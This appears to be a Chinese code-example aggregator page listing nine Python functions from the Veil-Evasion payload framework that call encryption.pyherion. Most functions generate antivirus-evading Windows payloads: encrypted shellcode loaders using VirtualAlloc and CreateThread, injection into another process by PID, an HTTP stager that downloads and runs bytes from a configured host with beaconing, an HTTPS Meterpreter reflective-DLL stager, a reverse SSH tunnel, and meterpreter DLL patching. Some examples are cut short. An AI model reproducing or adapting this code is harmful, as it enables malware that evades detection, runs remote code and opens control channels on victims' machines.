本文整理汇总了Python中modules.common.encryption.pyherion函数的典型用法代码示例。如果您正苦于以下问题:Python pyherion函数的具体用法?Python pyherion怎么用?Python pyherion使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
示例1: generate
def generate(self):
    """Return the Python payload source for this (template) module.

    This is a skeleton: it shows the steps a Veil payload module performs
    (get shellcode, build source text, consult options, optionally run the
    result through ``encryption.pyherion``) without building a real payload.
    Option values are read from ``self.required_options[<name>][0]``; only
    ``use_pyherion`` is consulted here.
    """
    # Generate Shellcode Using msfvenom
    # NOTE(review): the result is never used below -- the skeleton returns a
    # placeholder string plus a random suffix instead of real source.
    Shellcode = self.shellcode.generate()
    # build out your payload sourcecode (placeholder in this template)
    PayloadCode = "..."
    # add in a randomized string
    # helpers.randomString is a project helper; presumably a random
    # identifier-safe string -- confirm in modules/common/helpers.
    PayloadCode += helpers.randomString()
    # example of how to check the internal options
    # index 0 of an option entry holds its value string (the only element
    # read anywhere on this page); compared case-insensitively.
    if self.required_options["use_pyherion"][0].lower() == "y":
        # encryption.pyherion post-processes the generated source; judging
        # by the module path it adds an encryption/obfuscation layer, but the
        # exact scheme is not visible here.
        PayloadCode = encryption.pyherion(PayloadCode)
    # return everything
    return PayloadCode
示例2: generate
def generate(self):
    """Return the contents of a user-supplied Python file as the payload source.

    Reads the file named by the ``PYTHON_SOURCE`` option (text mode) and,
    when ``USE_PYHERION`` is ``y``, passes it through
    ``encryption.pyherion``.  Returns ``""`` when the file cannot be read:
    the ``IOError`` is caught and a warning is printed instead of raised.
    """
    # project hook; what it validates is not visible here
    self._validateArchitecture()
    PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0]
    try:
        # read in the python source
        # NOTE(review): no ``with`` block -- if f.read() raises, the handle
        # is never closed.  Only IOError is caught, so other read errors
        # propagate to the caller.
        f = open(PYTHON_SOURCE, 'r')
        PayloadCode = f.read()
        f.close()
    except IOError:
        # Python 2 print statement.  The message says "not found" for every
        # IOError (permission denied, directory, ...), not only ENOENT.
        # helpers.color presumably colourises the text -- confirm.
        print helpers.color("\n [!] PYTHON_SOURCE file \""+PYTHON_SOURCE+"\" not found\n", warning=True)
        # empty string is the failure signal callers check for
        return ""
    # example of how to check the internal options
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        # optional extra encryption/obfuscation layer (project module; exact
        # scheme not visible here)
        PayloadCode = encryption.pyherion(PayloadCode)
    # return everything
    return PayloadCode
示例3: generate
def generate(self):
    """Return the contents of a user-supplied Python file as the payload source.

    Same logic as the ``PYTHON_SOURCE``/``USE_PYHERION`` variant above, with
    lower-case option names (``python_source``, ``use_pyherion``).  Returns
    ``""`` when the file cannot be opened or read (``IOError`` is caught and
    a warning printed).
    """
    # project hook; what it validates is not visible here
    self._validateArchitecture()
    python_source = self.required_options["python_source"][0]
    try:
        # read in the python source
        # NOTE(review): no ``with`` block -- if f.read() raises, the handle
        # is never closed.  Only IOError is caught.
        f = open(python_source, 'r')
        PayloadCode = f.read()
        f.close()
    except IOError:
        # Python 2 print statement; reports "not found" for any IOError,
        # not only a missing file.
        print helpers.color("\n [!] python_source file \""+python_source+"\" not found\n", warning=True)
        # empty string is the failure signal callers check for
        return ""
    # example of how to check the internal options
    if self.required_options["use_pyherion"][0].lower() == "y":
        # optional extra encryption/obfuscation layer (project module; exact
        # scheme not visible here)
        PayloadCode = encryption.pyherion(PayloadCode)
    # return everything
    return PayloadCode
示例4: generate
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = "import ctypes\n"
PayloadCode += "from Crypto.Cipher import AES\n"
PayloadCode += "import base64\n"
PayloadCode += "import os\n"
PayloadCode += RandPadding + " = '{'\n"
PayloadCode += (
RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n"
)
PayloadCode += RandCipherObject + " = AES.new('" + secret + "')\n"
PayloadCode += (
RandDecodedShellcode
+ " = "
+ RandDecodeAES
+ "("
+ RandCipherObject
+ ", '"
+ EncodedShellcode
+ "')\n"
)
PayloadCode += RandShellCode + " = bytearray(" + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += (
RandPtr
+ " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
+ RandShellCode
+ ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
)
PayloadCode += (
RandBuf + " = (ctypes.c_char * len(" + RandShellCode + ")).from_buffer(" + RandShellCode + ")\n"
)
PayloadCode += (
"ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ",ctypes.c_int(len("
+ RandShellCode
+ ")))\n"
)
PayloadCode += (
RandHt
+ " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
+ RandPtr
+ "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
)
PayloadCode += (
"ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n"
)
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
#.........这里部分代码省略.........
示例5: generate
def generate(self):
    """Build Python source that writes shellcode into another process by PID.

    The generated stub uses ``ctypes``/``windll.kernel32`` to OpenProcess the
    PID from the ``PID_NUMBER`` option (0x1F0FFF = PROCESS_ALL_ACCESS),
    VirtualAllocEx a buffer there (0x1000 = MEM_COMMIT, 0x40 =
    PAGE_EXECUTE_READWRITE), WriteProcessMemory the shellcode into it and
    start it with CreateRemoteThread.

    ``EXPIRE_PAYLOAD``:
      * ``x``   -- no expiry; the stub runs the injection unconditionally.
      * <days>  -- the stub compares ``datetime.now()`` with a date <days>
                   from today (computed here, at generation time) and only
                   injects while it is still before that date.

    Returns the stub as a string, optionally wrapped by
    ``encryption.pyherion`` when ``USE_PYHERION`` is ``y``.

    NOTE(review): ``PID_NUMBER`` is concatenated verbatim into the generated
    source with no ``int()`` check; a non-numeric value becomes arbitrary
    text in the stub.  ``int(EXPIRE_PAYLOAD)`` raises ``ValueError`` for any
    value that is neither ``x`` nor an integer.
    """
    if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
        # Generate Shellcode Using msfvenom
        # (note: this module passes the options through, unlike the other
        # examples on this page which call generate() without arguments)
        Shellcode = self.shellcode.generate(self.required_options)
        # Generate Random Variable Names
        # every identifier in the emitted stub is randomised per build
        ShellcodeVariableName = helpers.randomString()
        pid_num_variable = helpers.randomString()
        pagerwx_variable = helpers.randomString()
        processall_variable = helpers.randomString()
        memcommit_variable = helpers.randomString()
        shell_length_variable = helpers.randomString()
        memalloc_variable = helpers.randomString()
        prochandle_variable = helpers.randomString()
        kernel32_variable = helpers.randomString()
        # Create Payload code
        PayloadCode = 'from ctypes import *\n\n'
        PayloadCode += pagerwx_variable + ' = 0x40\n'
        PayloadCode += processall_variable + ' = 0x1F0FFF\n'
        PayloadCode += memcommit_variable + ' = 0x00001000\n'
        PayloadCode += kernel32_variable + ' = windll.kernel32\n'
        # Shellcode is embedded as a double-quoted literal; this assumes
        # msfvenom output is already in escaped "\x.." form -- confirm.
        PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n'
        # PID_NUMBER inserted unvalidated (see docstring)
        PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
        PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n'
        PayloadCode += prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
        PayloadCode += memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
        PayloadCode += kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
        PayloadCode += kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
        if self.required_options["USE_PYHERION"][0].lower() == "y":
            # optional extra encryption/obfuscation layer (project module)
            PayloadCode = encryption.pyherion(PayloadCode)
        return PayloadCode
    else:
        # Get our current date and add number of days to the date
        # expiredate is 'YYYY-MM-DD'; the stub parses it with %y-%m-%d, which
        # is why only expiredate[2:] (century dropped) is embedded below.
        todaysdate = date.today()
        expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate(self.required_options)
        # Generate Random Variable Names
        ShellcodeVariableName = helpers.randomString()
        RandToday = helpers.randomString()
        RandExpire = helpers.randomString()
        pid_num_variable = helpers.randomString()
        pagerwx_variable = helpers.randomString()
        processall_variable = helpers.randomString()
        memcommit_variable = helpers.randomString()
        shell_length_variable = helpers.randomString()
        memalloc_variable = helpers.randomString()
        prochandle_variable = helpers.randomString()
        kernel32_variable = helpers.randomString()
        # Create Payload code
        PayloadCode = 'from ctypes import *\n'
        PayloadCode += 'from datetime import datetime\n'
        PayloadCode += 'from datetime import date\n\n'
        PayloadCode += RandToday + ' = datetime.now()\n'
        PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
        PayloadCode += pagerwx_variable + ' = 0x40\n'
        PayloadCode += processall_variable + ' = 0x1F0FFF\n'
        PayloadCode += memcommit_variable + ' = 0x00001000\n'
        PayloadCode += kernel32_variable + ' = windll.kernel32\n'
        PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n'
        PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
        PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n'
        # the injection calls are indented one tab under the date check so
        # the stub does nothing once the expiry date has passed
        PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
        PayloadCode += '\t' + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
        PayloadCode += '\t' + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
        PayloadCode += '\t' + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
        PayloadCode += '\t' + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
        if self.required_options["USE_PYHERION"][0].lower() == "y":
            # optional extra encryption/obfuscation layer (project module)
            PayloadCode = encryption.pyherion(PayloadCode)
        return PayloadCode
示例6: generate
def generate(self):
    """Build a Python stub that fetches a file over HTTP and runs it in-process.

    The emitted source (tab-indented, Python 2: ``urllib2``) defines:
      * an inject function -- VirtualAlloc (0x3000 = MEM_COMMIT|MEM_RESERVE,
        0x40 = PAGE_EXECUTE_READWRITE), VirtualLock, RtlMoveMemory, then
        CreateThread + WaitForSingleObject on the copied bytes;
      * a fetch function -- ``opener.open(url).read()`` wrapped in
        ``bytearray`` and handed to inject, with every exception swallowed;
      * a beacon function -- ``while True: sleep(interval); fetch in a
        daemon thread``;
      * a main -- builds ``http://DOWNLOAD_HOST:DOWNLOAD_PORT/DOWNLOAD_NAME``,
        starts the beacon thread when ``BEACON`` is ``y``, fetches once, and
        (beacon mode only) idles in a ``sleep(0.1)`` loop so the daemon
        threads stay alive.

    Returns the stub as a string, optionally wrapped by
    ``encryption.pyherion`` when ``USE_PYHERION`` is ``y``.

    NOTE(review): ``global_vars`` is only bound when ``BEACON`` is ``y`` or
    ``n``; any other value raises ``UnboundLocalError`` at the ``+=`` below.
    The stub executes whatever bytes the server returns, over plain HTTP,
    with no length or integrity check.
    """
    imports = "import sys; import urllib2; import ctypes; import time; import signal; import threading\n"
    # randomised names for every function/variable in the emitted stub
    inject_func = helpers.randomString()
    getexec_func = helpers.randomString()
    main_func = helpers.randomString()
    beaconthr_func = helpers.randomString()
    retry_var = helpers.randomString()
    # retry_var becomes a module-level bool in the stub; main() checks it
    # with ``is True`` before starting the beacon thread
    if self.required_options["BEACON"][0].lower() == 'n':
        global_vars = "%s = False" % retry_var
    elif self.required_options["BEACON"][0].lower() == 'y':
        global_vars = "%s = True" % retry_var
    interval_var = helpers.randomString()
    opener_var = helpers.randomString()
    # BEACON_SECONDS is interpolated verbatim (no int() validation)
    global_vars += "\n%s = %s" % (interval_var, self.required_options["BEACON_SECONDS"][0])
    global_vars += "\n%s = urllib2.build_opener()\n" % (opener_var)
    shellcode_var = helpers.randomString()
    ptr_var = helpers.randomString()
    ht_var = helpers.randomString()
    buff_var = helpers.randomString()
    # --- inject(shellcode): classic VirtualAlloc / RtlMoveMemory / CreateThread
    inject = "def %s(%s):" % (inject_func, shellcode_var)
    inject += "\n\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))" % (ptr_var, shellcode_var)
    inject += "\n\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))" % (ptr_var, shellcode_var)
    inject += "\n\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)" % (buff_var, shellcode_var, shellcode_var)
    inject += "\n\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))" % (ptr_var, buff_var, shellcode_var)
    inject += "\n\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))" % (ht_var, ptr_var)
    inject += "\n\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ht_var
    # fresh names for the fetch function; shellcode_var is deliberately
    # re-bound here (the inject string above is already built)
    url_var = helpers.randomString()
    shellcode_var = helpers.randomString()
    info_var = helpers.randomString()
    thread_var = helpers.randomString()
    thread_name = helpers.randomString()
    thread_name2 = helpers.randomString()  # NOTE(review): unused
    # --- getexec(url): download, bytearray, inject; errors are silently dropped
    getexec = "def %s(%s):" % (getexec_func, url_var)
    getexec += "\n\ttry:"
    getexec += "\n\t\t%s = %s.open(%s)" % (info_var, opener_var, url_var)
    getexec += "\n\t\t%s = %s.read()" % (shellcode_var, info_var)
    getexec += "\n\t\t%s = bytearray(%s)" % (shellcode_var, shellcode_var)
    getexec += "\n\t\t%s(%s)" % (inject_func, shellcode_var)
    getexec += "\n\texcept Exception:"
    getexec += "\n\t\tpass\n"
    # url_var re-bound again; this second name is shared by beaconthr and main
    url_var = helpers.randomString()
    # --- beaconthr(url): periodic re-fetch in daemon threads
    beaconthr = "def %s(%s):" % (beaconthr_func, url_var)
    beaconthr += "\n\twhile True:"
    beaconthr += "\n\t\ttime.sleep(%s)" % interval_var
    beaconthr += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, getexec_func, url_var)
    beaconthr += "\n\t\t%s.setDaemon(True)" % thread_var
    beaconthr += "\n\t\t%s.start()\n" % thread_var
    # --- main(): URL from options (interpolated verbatim), optional beacon, one fetch
    main = "def %s():" % main_func
    main += "\n\t%s = 'http://%s:%s/%s'" % (url_var, self.required_options['DOWNLOAD_HOST'][0], self.required_options['DOWNLOAD_PORT'][0], self.required_options['DOWNLOAD_NAME'][0])
    main += "\n\tif %s is True:" % retry_var
    main += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, beaconthr_func, url_var)
    main += "\n\t\t%s.setDaemon(True)" % thread_var
    main += "\n\t\t%s.start()" % thread_var
    main += "\n\t%s(%s)" % (getexec_func, url_var)
    if self.required_options["BEACON"][0].lower() == 'y':
        # keep the (otherwise finished) main thread alive so the daemon
        # beacon thread is not killed at interpreter exit
        main += "\n\twhile True:"
        main += "\n\t\ttime.sleep(0.1)"
    main += "\nif __name__ == '__main__':"
    main += "\n\t%s()" % main_func
    # pieces are concatenated in definition order; each ends with "\n"
    PayloadCode = imports + global_vars + inject + getexec + beaconthr + main
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        # optional extra encryption/obfuscation layer (project module)
        PayloadCode = encryption.pyherion(PayloadCode)
    return PayloadCode
示例7: generate
#.........这里部分代码省略.........
import thread
import threading
import select
def inject(shellcode):
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode)))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
def handler(chan, host, port):
sock = socket()
try:
sock.connect((host, port))
except Exception:
pass
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
sock.send(data)
chan.close()
sock.close()
def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):
transport.request_port_forward('', server_port)
while True:
chan = transport.accept(1000)
if chan is None:
continue
thr = threading.Thread(target=handler, args=(chan, remote_host, remote_port))
thr.setDaemon(True)
thr.start()
def main(user,password, rhost, port, shellport):
server = [rhost, int(port)]
remote = ['127.0.0.1', int(shellport)]
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(server[0], server[1], username=user, key_filename=None, look_for_keys=False, password=password)
except Exception:
pass
try:
reverse_forward_tunnel(int(shellport), remote[0], remote[1], client.get_transport())
except Exception:
pass
if __name__ == '__main__':
multiprocessing.freeze_support()
shellcode = r"%s"
shellcode = shellcode.decode("string_escape")
shellcode = bytearray(shellcode)
shellport = "%s"
time.sleep(2)
p = multiprocessing.Process(target=inject, args=(shellcode,))
jobs = []
jobs.append(p)
p.start()
user = "%s"
password = "%s"
rhost = "%s"
port = "%s"
time.sleep(3)
thread.start_new_thread(main,(user, password, rhost, port, shellport))""" % (Shellcode,
self.required_options["LPORT"][0],
self.required_options["SSHUSER"][0],
self.required_options["SSHPASS"][0],
self.required_options["SSHOST"][0],
self.required_options["SSHPORT"][0])
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
示例8: generate
def generate(self):
    """Build a Python (2) stager that downloads a reflective DLL over HTTPS and runs it.

    The emitted source defines, with randomised names:
      * a checksum helper -- ``sum(ord(ch)) % 0x100`` of a string;
      * a check-in URI generator -- up to 64 attempts to find a random
        4-character path whose checksum is 92 (the value the handler
        matches for this stage type, per the original comment);
      * a download function -- ``urllib2`` with a ``ProxyHandler()`` (so
        environment proxy settings are honoured) and a fixed MSIE 6.1
        User-Agent string; the body is returned only when ``Content-Length``
        is above 100000 bytes, or unconditionally when that header is
        missing/unparseable; ``URLError`` yields ``''``;
      * an inject function -- VirtualAlloc (0x3000 = MEM_COMMIT|MEM_RESERVE,
        0x40 = PAGE_EXECUTE_READWRITE), RtlMoveMemory, CreateThread,
        WaitForSingleObject on the downloaded bytes, skipped for ``""``;
      * top-level code that downloads from ``LHOST``/``LPORT`` and injects.

    Returns the stager as a string, optionally wrapped by
    ``encryption.pyherion`` when ``USE_PYHERION`` is ``y``.

    NOTE(review): the generated URI function falls off the end (returns
    ``None``) if none of the 64 attempts hits checksum 92, so the request
    URL then ends in ``/None``.  The generated code is Python 2 only
    (``xrange``, ``except urllib2.URLError, e``) and uses a bare ``except:``.
    ``LHOST``/``LPORT`` are interpolated verbatim with no validation.
    """
    payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"
    # randomize everything, yo'
    sumMethodName = helpers.randomString()
    checkinMethodName = helpers.randomString()
    randLettersName = helpers.randomString()
    randLetterSubName = helpers.randomString()
    randBaseName = helpers.randomString()
    downloadMethodName = helpers.randomString()
    hostName = helpers.randomString()
    portName = helpers.randomString()
    requestName = helpers.randomString()
    tName = helpers.randomString()
    injectMethodName = helpers.randomString()
    dataName = helpers.randomString()
    byteArrayName = helpers.randomString()
    ptrName = helpers.randomString()
    bufName = helpers.randomString()
    handleName = helpers.randomString()
    data2Name = helpers.randomString()
    proxy_var = helpers.randomString()
    opener_var = helpers.randomString()
    # helper method that returns the sum of all ord values in a string % 0x100
    # (``%%`` is a literal percent sign after %-formatting)
    payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)
    # method that generates a new checksum value for checkin to the meterpreter handler
    # 3 random base chars + 1 random suffix char; returns the first combo
    # whose checksum == 92, or None after 64 outer iterations (see docstring)
    payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName)
    payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
    payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
    payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
    payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)
    # method that connects to a host/port over https and downloads the hosted data
    payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
    # ProxyHandler() with no argument picks up *_proxy environment settings
    payloadCode += "\t" + proxy_var + " = urllib2.ProxyHandler()\n"
    payloadCode += "\t" + opener_var + " = urllib2.build_opener(" + proxy_var + ")\n"
    payloadCode += "\turllib2.install_opener(" + opener_var + ")\n"
    # the literal "%%s" placeholders survive this formatting step and are
    # filled in by the stub at runtime (host, port, check-in URI)
    payloadCode += "\t%s = urllib2.Request(\"https://%%s:%%s/%%s\" %%(%s,%s,%s()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" %(requestName, hostName, portName, checkinMethodName)
    payloadCode += "\ttry:\n"
    payloadCode += "\t\t%s = urllib2.urlopen(%s)\n" %(tName, requestName)
    payloadCode += "\t\ttry:\n"
    # size gate: only a body larger than 100000 bytes is treated as the DLL
    payloadCode += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" %(tName, tName)
    payloadCode += "\t\t\telse: return ''\n"
    # bare except in the stub: a missing/non-integer Content-Length reads anyway
    payloadCode += "\t\texcept: return %s.read()\n" % (tName)
    payloadCode += "\texcept urllib2.URLError, e: return ''\n"
    # method to inject a reflective .dll into memory
    payloadCode += "def %s(%s):\n" %(injectMethodName, dataName)
    payloadCode += "\tif %s != \"\":\n" %(dataName)
    payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)
    payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName)
    payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName)
    payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName)
    payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName)
    payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName)
    # download the meterpreter .dll and inject it
    payloadCode += "%s = ''\n" %(data2Name)
    # LHOST/LPORT inserted verbatim from the options
    payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
    payloadCode += "%s(%s)\n" %(injectMethodName, data2Name)
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        # optional extra encryption/obfuscation layer (project module)
        payloadCode = encryption.pyherion(payloadCode)
    return payloadCode
示例9: generate
def generate(self):
if os.path.exists(settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"):
metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
else:
print "[*] Error: You either do not have the latest version of Metasploit or"
print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file."
print "[*] Error: Please fix either issue then select this payload again!"
sys.exit()
f = open(metsrvPath, 'rb')
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]
# patch the metsrv.dll header
headerPatch = helpers.selfcontained_patch()
meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTP\x00"
meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
randVarName = helpers.randomString()
randFuncName = helpers.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName+"()\n"
# VirtualAlloc() injection
else:
payloadCode += 'import ctypes,base64,zlib\n'
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
randPtr = helpers.randomString()
randBuf = helpers.randomString()
randHt = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
